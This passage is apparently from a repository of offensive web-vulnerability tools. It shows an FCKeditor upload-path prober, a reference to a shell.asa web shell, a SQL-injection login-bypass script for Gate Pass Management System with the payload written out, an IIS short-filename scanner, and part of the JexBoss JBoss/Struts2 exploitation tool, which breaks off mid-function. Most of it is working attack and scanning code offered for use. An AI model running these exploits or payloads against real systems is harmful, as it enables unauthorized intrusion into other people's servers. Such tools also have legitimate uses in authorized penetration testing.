'/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 30 | '/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 31 | '/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 32 | '/editor/filemanager/browser/default/connectors/lasso/connector.lasso?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 33 | '/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 34 | '/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 35 | '/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 36 | '/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 37 | '/editor/filemanager/connectors/cfm/connector.cfm?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 38 | '/editor/filemanager/connectors/lasso/connector.lasso?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 39 | '/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 40 | '/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/' 41 | '/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F', 42 | '/FCKeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F', 43 | '/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F' 44 | ) 45 | try: 46 | for url in urls: 47 | url = URL + url 48 | 49 | verify_response = requests.get(url, headers=headers) 50 | html = verify_response.content.decode('utf-8') 51 | soup = 
re.search(r'', html) 52 | print("[+]此Fckeditor上传路径为:" + soup.group()) 53 | break 54 | except: 55 | print('[-]获取此Fckeditor上传路径错误') 56 | 57 | #print('[+]获取文件上传目录2.5 2.6:'+URL+'/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F') 58 | 59 | 60 | 61 | if __name__ == "__main__": 62 | attack() 63 | 64 | -------------------------------------------------------------------------------- /fckeditor/shell.asa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1120362990/vulnerability-list/ef35be4029f4e7160e64d8339f9e43513a7fc40f/fckeditor/shell.asa -------------------------------------------------------------------------------- /gatepass_vuln/Gate_Pass_Management_System_login_SQL_Injection.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import requests 4 | 5 | ''' 6 | Gate Pass Management System 2.1 - 'login' SQL Injection 7 | 发现时间:2018-11-02 8 | 参考:https://www.exploit-db.com/exploits/45766/ 9 | moon.py -u gatepass http:xx.xx.xx.xx:xx 登录界面 10 | ''' 11 | 12 | def attack(URL): 13 | print('[+]开始检测-Gate_Pass_Management_System_login_SQL_Injection。[+]') 14 | url = URL + '/login-exec.php' 15 | data = { 16 | #'login': 'admin','password': '123456', 17 | 'login': r"'or 1=1 or ''='", 'password': r"'or 1=1 or ''='", 18 | 'Submit': 'value', 19 | } 20 | try: 21 | r = requests.post(url,data=data) 22 | if 'Please check your username and password' in r.text: 23 | print('[-]账户密码错误,绕过登录失败,不存在漏洞。') 24 | print('检测页面:'+url) 25 | elif 'Industronics Engineering' in r.text: 26 | print('[+]绕过登录成功,存在sql注入漏洞。') 27 | print('漏洞连接:'+url) 28 | print("利用方法:login='or 1=1 or ''='&password='or 1=1 or ''='&Submit=Login") 29 | else: 30 | print('[!]检测时发生错误,可能不存在漏洞页面。') 31 | except: 32 | print('[!]连接端口时发生错误。') 33 | print('[+]检测完成-Gate_Pass_Management_System_login_SQL_Injection。[+]') 34 | print('\n') 35 | if __name__ == 
"__main__": 36 | attack() 37 | -------------------------------------------------------------------------------- /gatepass_vuln/Main_gatepass.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection 3 | 4 | 5 | def exec(URL): 6 | gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /gatepass_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /iis/Main_iis.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import iis.iis_shortname_Scan 3 | import os 4 | 5 | def exec(URL): 6 | # print('[+]开始检测-IIS短文件名漏洞。[+]') 7 | # #切换工作路径 8 | # os.chdir('iis') 9 | # os.system("py -2 iis_shortname_Scan.py "+URL) 10 | # print('[+]检测完成-IIS短文件名漏洞。[+]') 11 | 12 | iis.iis_shortname_Scan.attack(URL) 13 | 14 | if __name__ == "__main__": 15 | exec() 16 | -------------------------------------------------------------------------------- /iis/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /iis/iis_shortname_Scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding:utf-8 3 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com 4 | 5 | 6 | import sys 7 | import http.client 8 | from urllib.parse import urlparse 9 | import threading 10 | import queue 11 | import time 12 | 13 | 14 | class Scanner(): 15 | def __init__(self, target): 16 | self.target = 
target.lower() 17 | if not self.target.startswith('http'): 18 | self.target = 'http://%s' % self.target 19 | self.scheme, self.netloc, self.path, params, query, fragment = \ 20 | urlparse(target) 21 | if self.path[-1:] != '/': # ends with slash 22 | self.path += '/' 23 | self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-' 24 | self.files = [] 25 | self.dirs = [] 26 | self.queue = queue.Queue() 27 | self.lock = threading.Lock() 28 | self.threads = [] 29 | self.request_method = '' 30 | self.msg_queue = queue.Queue() 31 | self.STOP_ME = False 32 | threading.Thread(target=self._print).start() 33 | 34 | def _conn(self): 35 | try: 36 | if self.scheme == 'https': 37 | conn = http.client.HTTPSConnection(self.netloc) 38 | else: 39 | conn = http.client.HTTPConnection(self.netloc) 40 | return conn 41 | except Exception as e: 42 | print('[_conn.Exception]', e) 43 | return None 44 | 45 | def _get_status(self, path): 46 | try: 47 | conn = self._conn() 48 | conn.request(self.request_method, path) 49 | status = conn.getresponse().status 50 | conn.close() 51 | return status 52 | except Exception as e: 53 | raise Exception('[_get_status.Exception] %s' % str(e) ) 54 | 55 | def is_vul(self): 56 | try: 57 | for _method in ['GET', 'OPTIONS']: 58 | self.request_method = _method 59 | status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder 60 | status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder 61 | if status_1 == 404 and status_2 != 404: 62 | return True 63 | return False 64 | except Exception as e: 65 | raise Exception('[is_vul.Exception] %s' % str(e) ) 66 | 67 | def run(self): 68 | for c in self.alphanum: 69 | self.queue.put( (self.path + c, '.*') ) # filename, extension 70 | for i in range(20): 71 | t = threading.Thread(target=self._scan_worker) 72 | self.threads.append(t) 73 | t.start() 74 | for t in self.threads: 75 | t.join() 76 | self.STOP_ME = True 77 | 78 | def report(self): 79 | print('-'* 64) 80 | for d in 
self.dirs: 81 | print('Dir: %s' % d) 82 | for f in self.files: 83 | print('File: %s' % f) 84 | print('-'*64) 85 | print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files))) 86 | print('Note that * is a wildcard, matches any character zero or more times.') 87 | 88 | def _print(self): 89 | while not self.STOP_ME or (not self.msg_queue.empty()): 90 | if self.msg_queue.empty(): 91 | time.sleep(0.05) 92 | else: 93 | print(self.msg_queue.get()) 94 | 95 | def _scan_worker(self): 96 | while True: 97 | try: 98 | url, ext = self.queue.get(timeout=1.0) 99 | status = self._get_status(url + '*~1' + ext + '/1.aspx') 100 | if status == 404: 101 | self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext)) 102 | 103 | if len(url) - len(self.path)< 6: # enum first 6 chars only 104 | for c in self.alphanum: 105 | self.queue.put( (url + c, ext) ) 106 | else: 107 | if ext == '.*': 108 | self.queue.put( (url, '') ) 109 | 110 | if ext == '': 111 | self.dirs.append(url + '~1') 112 | self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]') 113 | 114 | elif len(ext) == 5 or (not ext.endswith('*')): # .asp* 115 | self.files.append(url + '~1' + ext) 116 | self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]') 117 | 118 | else: 119 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789': 120 | self.queue.put( (url, ext[:-1] + c + '*') ) 121 | if len(ext) < 4: # < len('.as*') 122 | self.queue.put( (url, ext[:-1] + c) ) 123 | 124 | except queue.Empty as e: 125 | break 126 | except Exception as e: 127 | print('[Exception]', e) 128 | 129 | 130 | def attack(URL): 131 | s = Scanner(URL) 132 | if not s.is_vul(): 133 | s.STOP_ME = True 134 | print('Server is not vulnerable') 135 | sys.exit(0) 136 | 137 | print('Server is vulnerable, please wait, scanning...') 138 | s.run() 139 | s.report() 140 | 141 | 142 | 143 | if __name__ == '__main__': 144 | attack() 145 | -------------------------------------------------------------------------------- /jboss/Main_jboss.py: 
-------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import jboss 4 | 5 | 6 | def exec(URL): 7 | print('[+]开始检测-jboss。[+]') 8 | # 切换工作路径 9 | os.chdir(os.path.realpath(__file__)[:35]) 10 | os.system("py -2 jexboss.py -host "+URL) 11 | print('[+]检测结束-jboss。[+]') 12 | 13 | 14 | if __name__ == "__main__": 15 | exec() 16 | -------------------------------------------------------------------------------- /jboss/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /jboss/_updates.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Module for managing updates to the JexBoss 4 | https://github.com/joaomatosf/jexboss 5 | 6 | Copyright 2013 João Filho Matos Figueiredo 7 | 8 | Licensed under the Apache License, Version 2.0 (the "License"); 9 | you may not use this file except in compliance with the License. 10 | You may obtain a copy of the License at 11 | 12 | http://www.apache.org/licenses/LICENSE-2.0 13 | 14 | Unless required by applicable law or agreed to in writing, software 15 | distributed under the License is distributed on an "AS IS" BASIS, 16 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 17 | See the License for the specific language governing permissions and 18 | limitations under the License. 
19 | """ 20 | 21 | RED = '\x1b[91m' 22 | RED1 = '\033[31m' 23 | BLUE = '\033[94m' 24 | GREEN = '\033[32m' 25 | BOLD = '\033[1m' 26 | NORMAL = '\033[0m' 27 | ENDC = '\033[0m' 28 | 29 | import jexboss 30 | from sys import version_info 31 | import os 32 | import shutil 33 | from zipfile import ZipFile 34 | import traceback 35 | import logging, datetime 36 | logging.captureWarnings(True) 37 | FORMAT = "%(asctime)s (%(levelname)s): %(message)s" 38 | logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO) 39 | 40 | 41 | 42 | global gl_http_pool 43 | 44 | 45 | def set_http_pool(pool): 46 | global gl_http_pool 47 | gl_http_pool = pool 48 | 49 | 50 | def auto_update(): 51 | """ 52 | Download and deploy the latest version 53 | :return: True if successfully updated 54 | """ 55 | url = 'https://github.com/joaomatosf/jexboss/archive/master.zip' 56 | 57 | # backup of prior version7 58 | if os.path.exists('old_version'): 59 | shutil.rmtree('old_version') 60 | shutil.copytree(".", "." + os.path.sep + "old_version") 61 | 62 | # download and extract of new version 63 | jexboss.print_and_flush(GREEN + " * Downloading the new version from %s." %url +ENDC ) 64 | r = gl_http_pool.request('GET', url) 65 | if r.status != 200: 66 | jexboss.print_and_flush(RED + " * Error: Could not complete the download of the new version. Check your internet connection." + ENDC) 67 | return False 68 | with open('master.zip', 'wb') as f: 69 | f.write(r.data) 70 | z = ZipFile('master.zip', 'r') 71 | jexboss.print_and_flush(GREEN + " * Extracting new version..." +ENDC) 72 | z.extractall(path='.') 73 | z.close() 74 | os.remove('master.zip') 75 | path_new_version = '.' + os.path.sep + 'jexboss-master' 76 | jexboss.print_and_flush(GREEN + " * Replacing the current version with the new version..." 
+ ENDC) 77 | for root, dirs, files in os.walk(path_new_version): 78 | for file in files: 79 | old_path = root.replace(path_new_version, '.') + os.path.sep 80 | old_file = root.replace(path_new_version, '.') + os.path.sep + file 81 | new_file = os.path.join(root, file) 82 | 83 | if not os.path.exists(old_path): 84 | os.makedirs(old_path) 85 | 86 | shutil.move(new_file, old_file) 87 | # remove extracted directory of the new version 88 | shutil.rmtree('.'+os.path.sep+'jexboss-master') 89 | 90 | return True 91 | 92 | 93 | def check_updates(): 94 | """ 95 | Checks if there is new version available 96 | :return: boolean if there updates 97 | """ 98 | url = 'http://joaomatosf.com/rnp/releases.txt' 99 | jexboss.print_and_flush(BLUE + " * Checking for updates in: %s **\n" % url + ENDC) 100 | header = {"User-Agent": "Checking for updates"} 101 | 102 | try: 103 | r = gl_http_pool.request('GET', url, redirect=False, headers=header) 104 | except: 105 | jexboss.print_and_flush(RED + " * Error: Failed to check for updates ...\n" + ENDC) 106 | logging.warning("Failed to check for updates.", exc_info=traceback) 107 | return False 108 | 109 | if r.status != 200: 110 | jexboss.print_and_flush(RED + " * Error: could not check for updates ...\n" + ENDC) 111 | logging.warning("Failed to check for updates. 
HTTP Code: %s" % r.status) 112 | return False 113 | else: 114 | current_version = jexboss.__version__ 115 | link = 'https://github.com/joaomatosf/jexboss/archive/master.zip' 116 | date_last_version = '' 117 | notes = [] 118 | # search for new versions 119 | resp = str(r.data).replace('\\n','\n') 120 | for line in resp.split('\n'): 121 | if "#" in line: 122 | continue 123 | if 'last_version' in line: 124 | last_version = line.split()[1] 125 | elif 'date:' in line: 126 | date_last_version = line.split()[1] 127 | elif 'link:' in line: 128 | link = line 129 | elif '* ' in line: 130 | notes.append(line) 131 | elif 'version:' in line and 'last_' not in line: 132 | break 133 | # compare last_version with current version 134 | tup = lambda x: [int(y) for y in (x + '.0.0.0').split('.')][:3] 135 | if tup(last_version) > tup(current_version): 136 | jexboss.print_and_flush ( 137 | GREEN + BOLD + " * NEW VERSION AVAILABLE: JexBoss v%s (%s)\n" % (last_version, date_last_version) + ENDC + 138 | GREEN + " * Link: %s\n" % link + 139 | GREEN + " * Release notes:") 140 | for note in notes: 141 | jexboss.print_and_flush (" %s" % note) 142 | return True 143 | else: 144 | return False -------------------------------------------------------------------------------- /jboss/jexboss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | """ 4 | JexBoss: Jboss verify and EXploitation Tool 5 | https://github.com/joaomatosf/jexboss 6 | 7 | Copyright 2013 João Filho Matos Figueiredo 8 | 9 | Licensed under the Apache License, Version 2.0 (the "License"); 10 | you may not use this file except in compliance with the License. 
11 | You may obtain a copy of the License at 12 | 13 | http://www.apache.org/licenses/LICENSE-2.0 14 | 15 | Unless required by applicable law or agreed to in writing, software 16 | distributed under the License is distributed on an "AS IS" BASIS, 17 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 18 | See the License for the specific language governing permissions and 19 | limitations under the License. 20 | """ 21 | import textwrap 22 | import traceback 23 | import logging 24 | import datetime 25 | import signal 26 | import _exploits 27 | import _updates 28 | from os import name, system 29 | import os, sys 30 | import shutil 31 | from zipfile import ZipFile 32 | from time import sleep 33 | from random import randint 34 | import argparse, socket 35 | from sys import argv, exit, version_info 36 | logging.captureWarnings(True) 37 | FORMAT = "%(asctime)s (%(levelname)s): %(message)s" 38 | logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO) 39 | 40 | __author__ = "João Filho Matos Figueiredo " 41 | __version__ = "1.2.4" 42 | 43 | RED = '\x1b[91m' 44 | RED1 = '\033[31m' 45 | BLUE = '\033[94m' 46 | GREEN = '\033[32m' 47 | BOLD = '\033[1m' 48 | NORMAL = '\033[0m' 49 | ENDC = '\033[0m' 50 | 51 | 52 | def print_and_flush(message, same_line=False): 53 | if same_line: 54 | print (message), 55 | else: 56 | print (message) 57 | if not sys.stdout.isatty(): 58 | sys.stdout.flush() 59 | 60 | 61 | if version_info[0] == 2 and version_info[1] < 7: 62 | print_and_flush(RED1 + BOLD + "\n * You are using the Python version 2.6. The JexBoss requires version >= 2.7.\n" 63 | "" + GREEN + " Please install the Python version >= 2.7. 
\n\n" 64 | " Example for CentOS using Software Collections scl:\n" 65 | " # yum -y install centos-release-scl\n" 66 | " # yum -y install python27\n" 67 | " # scl enable python27 bash\n" + ENDC) 68 | logging.CRITICAL('Python version 2.6 is not supported.') 69 | exit(0) 70 | 71 | try: 72 | import readline 73 | readline.parse_and_bind('set editing-mode vi') 74 | except: 75 | logging.warning('Module readline not installed. The terminal will not support the arrow keys.', exc_info=traceback) 76 | print_and_flush(RED1 + "\n * Module readline not installed. The terminal will not support the arrow keys.\n" + ENDC) 77 | 78 | 79 | try: 80 | from urllib.parse import urlencode 81 | except ImportError: 82 | from urllib import urlencode 83 | 84 | try: 85 | from urllib3.util import parse_url 86 | from urllib3 import PoolManager 87 | from urllib3 import ProxyManager 88 | from urllib3 import make_headers 89 | from urllib3.util import Timeout 90 | except ImportError: 91 | print_and_flush(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n" 92 | "" + GREEN + " Example: \n" 93 | " # pip install -r requires.txt\n" + ENDC) 94 | logging.critical('Module urllib3 not installed. See details:', exc_info=traceback) 95 | exit(0) 96 | 97 | try: 98 | import ipaddress 99 | except: 100 | print_and_flush(RED1 + BOLD + "\n * Package ipaddress not installed. Please install the dependencies before continue.\n" 101 | "" + GREEN + " Example: \n" 102 | " # pip install -r requires.txt\n" + ENDC) 103 | logging.critical('Module ipaddress not installed. 
See details:', exc_info=traceback) 104 | exit(0) 105 | 106 | global gl_interrupted 107 | gl_interrupted = False 108 | global gl_args 109 | global gl_http_pool 110 | 111 | 112 | def get_random_user_agent(): 113 | user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0", 114 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", 115 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", 116 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9", 117 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36", 118 | "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0", 119 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", 120 | "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)", 121 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", 122 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0", 123 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36", 124 | "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17", 125 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0", 126 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"] 127 | return user_agents[randint(0, len(user_agents) - 1)] 128 | 129 | 130 | def is_proxy_ok(): 131 | print_and_flush(GREEN + "\n ** Checking proxy: %s **\n\n" % gl_args.proxy) 132 | 133 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 134 | "Connection": "keep-alive", 135 | "User-Agent": get_random_user_agent()} 136 | try: 137 | r = gl_http_pool.request('GET', gl_args.host, redirect=False, headers=headers) 138 | 
except: 139 | print_and_flush(RED + " * Error: Failed to connect to %s using proxy %s.\n" 140 | " See logs for more details...\n" %(gl_args.host,gl_args.proxy) + ENDC) 141 | logging.warning("Failed to connect to %s using proxy" %gl_args.host, exc_info=traceback) 142 | return False 143 | 144 | if r.status == 407: 145 | print_and_flush(RED + " * Error 407: Proxy authentication is required. \n" 146 | " Please enter the correct login and password for authentication. \n" 147 | " Example: -P http://proxy.com:3128 -L username:password\n" + ENDC) 148 | logging.error("Proxy authentication failed") 149 | return False 150 | 151 | elif r.status == 503 or r.status == 502: 152 | print_and_flush(RED + " * Error %s: The service %s is not availabel to your proxy. \n" 153 | " See logs for more details...\n" %(r.status,gl_args.host)+ENDC) 154 | logging.error("Service unavailable to your proxy") 155 | return False 156 | else: 157 | return True 158 | 159 | 160 | def configure_http_pool(): 161 | 162 | global gl_http_pool 163 | 164 | if gl_args.mode == 'auto-scan' or gl_args.mode == 'file-scan': 165 | timeout = Timeout(connect=1.0, read=3.0) 166 | else: 167 | timeout = Timeout(connect=gl_args.timeout, read=6.0) 168 | 169 | if gl_args.proxy: 170 | # when using proxy, protocol should be informed 171 | if (gl_args.host is not None and 'http' not in gl_args.host) or 'http' not in gl_args.proxy: 172 | print_and_flush(RED + " * When using proxy, you must specify the http or https protocol" 173 | " (eg. 
http://%s).\n\n" %(gl_args.host if 'http' not in gl_args.host else gl_args.proxy) +ENDC) 174 | logging.critical('Protocol not specified') 175 | exit(1) 176 | 177 | try: 178 | if gl_args.proxy_cred: 179 | headers = make_headers(proxy_basic_auth=gl_args.proxy_cred) 180 | gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, proxy_headers=headers, timeout=timeout, cert_reqs='CERT_NONE') 181 | else: 182 | gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, timeout=timeout, cert_reqs='CERT_NONE') 183 | except: 184 | print_and_flush(RED + " * An error occurred while setting the proxy. Please see log for details..\n\n" +ENDC) 185 | logging.critical('Error while setting the proxy', exc_info=traceback) 186 | exit(1) 187 | else: 188 | gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') 189 | 190 | 191 | def handler_interrupt(signum, frame): 192 | global gl_interrupted 193 | gl_interrupted = True 194 | print_and_flush ("Interrupting execution ...") 195 | logging.info("Interrupting execution ...") 196 | exit(1) 197 | 198 | signal.signal(signal.SIGINT, handler_interrupt) 199 | 200 | 201 | def check_connectivity(host, port): 202 | try: 203 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 204 | s.settimeout(2) 205 | s.connect((str(host), int(port))) 206 | s.close() 207 | except socket.timeout: 208 | logging.info("Failed to connect to %s:%s" %(host,port)) 209 | return False 210 | except: 211 | logging.info("Failed to connect to %s:%s" % (host, port)) 212 | return False 213 | 214 | return True 215 | 216 | 217 | def check_vul(url): 218 | """ 219 | Test if a GET to a URL is successful 220 | :param url: The URL to test 221 | :return: A dict with the exploit type as the keys, and the HTTP status code as the value 222 | """ 223 | url_check = parse_url(url) 224 | if '443' in str(url_check.port) and url_check.scheme != 'https': 225 | url = "https://"+str(url_check.host)+":"+str(url_check.port)+str(url_check.path) 226 | 227 | print_and_flush(GREEN + "\n ** Checking 
Host: %s **\n" % url) 228 | logging.info("Checking Host: %s" % url) 229 | 230 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 231 | "Connection": "keep-alive", 232 | "User-Agent": get_random_user_agent()} 233 | 234 | paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", 235 | "web-console": "/web-console/Invoker", 236 | "JMXInvokerServlet": "/invoker/JMXInvokerServlet", 237 | "admin-console": "/admin-console/", 238 | "Application Deserialization": "", 239 | "Servlet Deserialization" : "", 240 | "Jenkins": "", 241 | "Struts2": "", 242 | "JMX Tomcat" : ""} 243 | 244 | fatal_error = False 245 | 246 | for vector in paths: 247 | r = None 248 | if gl_interrupted: break 249 | try: 250 | 251 | # check jmx tomcat only if specifically chosen 252 | if (gl_args.jmxtomcat and vector != 'JMX Tomcat') or\ 253 | (not gl_args.jmxtomcat and vector == 'JMX Tomcat'): continue 254 | 255 | if gl_args.app_unserialize and vector != 'Application Deserialization': continue 256 | 257 | if gl_args.struts2 and vector != 'Struts2': continue 258 | 259 | if gl_args.servlet_unserialize and vector != 'Servlet Deserialization': continue 260 | 261 | if gl_args.jboss and vector not in ('jmx-console', 'web-console', 'JMXInvokerServlet', 'admin-console'): continue 262 | 263 | if gl_args.jenkins and vector != 'Jenkins': continue 264 | 265 | if gl_args.force: 266 | paths[vector] = 200 267 | continue 268 | 269 | print_and_flush(GREEN + " [*] Checking %s: %s" % (vector, " " * (27 - len(vector))) + ENDC, same_line=True) 270 | 271 | # check jenkins 272 | if vector == 'Jenkins': 273 | 274 | cli_port = None 275 | # check version and search for CLI-Port 276 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers) 277 | all_headers = r.getheaders() 278 | 279 | # versions > 658 are not vulnerable 280 | if 'X-Jenkins' in all_headers: 281 | version = int(all_headers['X-Jenkins'].split('.')[1].split('.')[0]) 
282 | if version >= 638: 283 | paths[vector] = 505 284 | continue 285 | 286 | for h in all_headers: 287 | if 'CLI-Port' in h: 288 | cli_port = int(all_headers[h]) 289 | break 290 | 291 | if cli_port is not None: 292 | paths[vector] = 200 293 | else: 294 | paths[vector] = 505 295 | 296 | # chek vul for Java Unserializable in Application Parameters 297 | elif vector == 'Application Deserialization': 298 | 299 | r = gl_http_pool.request('GET', url, redirect=False, headers=headers) 300 | if r.status in (301, 302, 303, 307, 308): 301 | cookie = r.getheader('set-cookie') 302 | if cookie is not None: headers['Cookie'] = cookie 303 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers) 304 | # link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter) 305 | obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter) 306 | 307 | # if no obj serialized, check if there's a html refresh redirect and follow it 308 | if obj is None: 309 | # check if theres a redirect link 310 | link = _exploits.get_html_redirect_link(str(r.data)) 311 | 312 | # If it is a redirect link. 
Follow it 313 | if link is not None: 314 | r = gl_http_pool.request('GET', url + "/" + link, redirect=True, headers=headers) 315 | #link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter) 316 | obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter) 317 | 318 | # if obj does yet None 319 | if obj is None: 320 | # search for other params that can be exploited 321 | list_params = _exploits.get_list_params_with_serialized_objs(str(r.data)) 322 | if len(list_params) > 0: 323 | paths[vector] = 110 324 | print_and_flush(RED + " [ CHECK OTHER PARAMETERS ]" + ENDC) 325 | print_and_flush(RED + "\n * The \"%s\" parameter does not appear to be vulnerable.\n" %gl_args.post_parameter + 326 | " But there are other parameters that it seems to be xD!\n" +ENDC+GREEN+ 327 | BOLD+ "\n Try these other parameters: \n" +ENDC) 328 | for p in list_params: 329 | print_and_flush(GREEN + " -H %s" %p+ ENDC) 330 | print ("") 331 | elif obj is not None and obj == 'stateless': 332 | paths[vector] = 100 333 | elif obj is not None: 334 | paths[vector] = 200 335 | 336 | # chek vul for Java Unserializable in viewState 337 | elif vector == 'Servlet Deserialization': 338 | 339 | r = gl_http_pool.request('GET', url, redirect=False, headers=headers) 340 | if r.status in (301, 302, 303, 307, 308): 341 | cookie = r.getheader('set-cookie') 342 | if cookie is not None: headers['Cookie'] = cookie 343 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers) 344 | 345 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'): 346 | paths[vector] = 200 347 | else: 348 | paths[vector] = 505 349 | 350 | elif vector == 'Struts2': 351 | 352 | result = _exploits.exploit_struts2_jakarta_multipart(url, 'jexboss', gl_args.cookies) 353 | if result is None or "Could not get command" in str(result) : 354 | paths[vector] = 100 355 | elif 'jexboss' in str(result) and "" not in str(result).lower(): 356 | paths[vector] = 
200 357 | else: 358 | paths[vector] = 505 359 | 360 | elif vector == 'JMX Tomcat': 361 | 362 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 363 | s.settimeout(7) 364 | host_rmi = url.split(':')[0] 365 | port_rmi = int(url.split(':')[1]) 366 | s.connect((host_rmi, port_rmi)) 367 | s.send(b"JRMI\x00\x02K") 368 | msg = s.recv(1024) 369 | octets = str(msg[3:]).split(".") 370 | if len(octets) != 4: 371 | paths[vector] = 505 372 | else: 373 | paths[vector] = 200 374 | 375 | # check jboss vectors 376 | elif vector == "JMXInvokerServlet": 377 | # user privided web-console path and checking JMXInvoker... 378 | if "/web-console/Invoker" in url: 379 | paths[vector] = 505 380 | # if the user not provided the path, append the "/invoker/JMXInvokerServlet" 381 | else: 382 | 383 | if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector])+"/"): 384 | url_to_check = url + str(paths[vector]) 385 | else: 386 | url_to_check = url 387 | 388 | r = gl_http_pool.request('HEAD', url_to_check , redirect=False, headers=headers) 389 | # if head method is not allowed/supported, try GET 390 | if r.status in (405, 406): 391 | r = gl_http_pool.request('GET', url_to_check , redirect=False, headers=headers) 392 | 393 | # if web-console/Invoker or 